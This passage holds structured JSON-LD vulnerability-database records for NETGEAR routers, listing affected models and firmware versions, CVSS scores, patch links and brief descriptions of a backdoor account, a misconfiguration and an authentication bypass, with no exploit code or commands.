"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0602",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6300",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v2"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1"
},
{
"model": "wndr3300",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v2"
},
{
"model": "wndr3700 router",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3800",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wndr4300",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wndr4500",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wnr3500l",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2013-15013",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-15013",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear is a well-known manufacturer of network equipment. Its router products are mainly used for enterprises and individual users.\r\n\r\n\r\nMany routers produced by NetGear have backdoors. The backdoor is the super user and password set by the manufacturer. The attacker can use the backdoor to obtain the root authority of the router in the adjacent network, and then implant the Trojan horse to completely control the user\u0027s router. Subsequent dns hijacking attacks can be launched.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-15013",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"id": "VAR-201312-0602",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
],
"trust": 1.4353004999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"last_update_date": "2022-05-04T10:16:42.620000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for Many NetGear routers have backdoor vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/44671"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15013"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Many NetGear routers have backdoor vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15013"
}
],
"trust": 0.6
}
}
var-202004-1345
Vulnerability from variot
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94. plural NETGEAR An unspecified vulnerability exists in the device.Information may be obtained. NETGEAR R6250, etc. are all wireless routers from NETGEAR. No detailed vulnerability details are currently provided
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1345",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
}
]
},
"cve": "CVE-2017-18741",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18741",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014938",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-57161",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18741",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18741",
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014938",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18741",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18741",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014938",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-57161",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1982",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1982"
},
{
"db": "NVD",
"id": "CVE-2017-18741"
},
{
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94. plural NETGEAR An unspecified vulnerability exists in the device.Information may be obtained. NETGEAR R6250, etc. are all wireless routers from NETGEAR. No detailed vulnerability details are currently provided",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18741"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"db": "CNVD",
"id": "CNVD-2021-57161"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18741",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-57161",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1982",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1982"
},
{
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"id": "VAR-202004-1345",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
}
],
"trust": 1.034513655
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
}
]
},
"last_update_date": "2024-11-23T22:44:36.386000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration on Some Routers, PSV-2017-0335",
"trust": 0.8,
"url": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335"
},
{
"title": "Patch for Unspecified vulnerabilities exist in many NETGEAR products (CNVD-2021-57161)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/282681"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18741"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051514/security-advisory-for-security-misconfiguration-on-some-routers-psv-2017-0335"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18741"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1982"
},
{
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1982"
},
{
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1982"
},
{
"date": "2020-04-23T16:15:12.507000",
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-57161"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014938"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1982"
},
{
"date": "2024-11-21T03:20:48.547000",
"db": "NVD",
"id": "CVE-2017-18741"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1982"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014938"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1982"
}
],
"trust": 0.6
}
}
var-202108-1620
Vulnerability from variot
Certain NETGEAR devices are affected by authentication bypass. This affects D3600 prior to 1.0.0.72, D6000 prior to 1.0.0.72, D6100 prior to 1.0.0.63, D6200 prior to 1.1.00.34, D6220 prior to 1.0.0.48, D6400 prior to 1.0.0.86, D7000 prior to 1.0.1.70, D7000v2 prior to 1.0.0.52, D7800 prior to 1.0.1.56, D8500 prior to 1.0.3.44, DC112A prior to 1.0.0.42, DGN2200v4 prior to 1.0.0.108, DGND2200Bv4 prior to 1.0.0.108, EX2700 prior to 1.0.1.48, EX3700 prior to 1.0.0.76, EX3800 prior to 1.0.0.76, EX6000 prior to 1.0.0.38, EX6100 prior to 1.0.2.24, EX6100v2 prior to 1.0.1.76, EX6120 prior to 1.0.0.42, EX6130 prior to 1.0.0.28, EX6150v1 prior to 1.0.0.42, EX6150v2 prior to 1.0.1.76, EX6200 prior to 1.0.3.88, EX6200v2 prior to 1.0.1.72, EX6400 prior to 1.0.2.136, EX7000 prior to 1.0.0.66, EX7300 prior to 1.0.2.136, EX8000 prior to 1.0.1.180, RBK50 prior to 2.1.4.10, RBR50 prior to 2.1.4.10, RBS50 prior to 2.1.4.10, RBK40 prior to 2.1.4.10, RBR40 prior to 2.1.4.10, RBS40 prior to 2.1.4.10, RBW30 prior to 2.2.1.204, PR2000 prior to 1.0.0.28, R6020 prior to 1.0.0.38, R6080 prior to 1.0.0.38, R6050 prior to 1.0.1.18, JR6150 prior to 1.0.1.18, R6120 prior to 1.0.0.46, R6220 prior to 1.1.0.86, R6250 prior to 1.0.4.34, R6300v2 prior to 1.0.4.32, R6400 prior to 1.0.1.44, R6400v2 prior to 1.0.2.62, R6700 prior to 1.0.1.48, R6700v2 prior to 1.2.0.36, R6800 prior to 1.2.0.36, R6900v2 prior to 1.2.0.36, R6900 prior to 1.0.1.48, R7000 prior to 1.0.9.34, R6900P prior to 1.3.1.64, R7000P prior to 1.3.1.64, R7100LG prior to 1.0.0.48, R7300DST prior to 1.0.0.70, R7500v2 prior to 1.0.3.38, R7800 prior to 1.0.2.52, R7900 prior to 1.0.3.8, R8000 prior to 1.0.4.28, R7900P prior to 1.4.1.30, R8000P prior to 1.4.1.30, R8300 prior to 1.0.2.128, R8500 prior to 1.0.2.128, R9000 prior to 1.0.3.10, RBS40V prior to 2.2.0.58, RBK50V prior to 2.2.0.58, WN2000RPTv3 prior to 1.0.1.32, WN2500RPv2 prior to 1.0.1.54, WN3000RPv3 prior to 1.0.2.78, WN3100RPv2 prior to 1.0.0.66, WNDR3400v3 prior to 1.0.1.22, WNDR3700v4 prior to 1.0.2.102, WNDR4300v1 prior to 1.0.2.104, WNDR4300v2 prior to 1.0.0.56, WNDR4500v3 prior to 1.0.0.56, WNR2000v5 (R2000) prior to 1.0.0.66, WNR2020 prior to 1.1.0.62, WNR2050 prior to 1.1.0.62, WNR3500Lv2 prior to 1.2.0.62, and XR500 prior to 2.3.2.22.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-1620",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
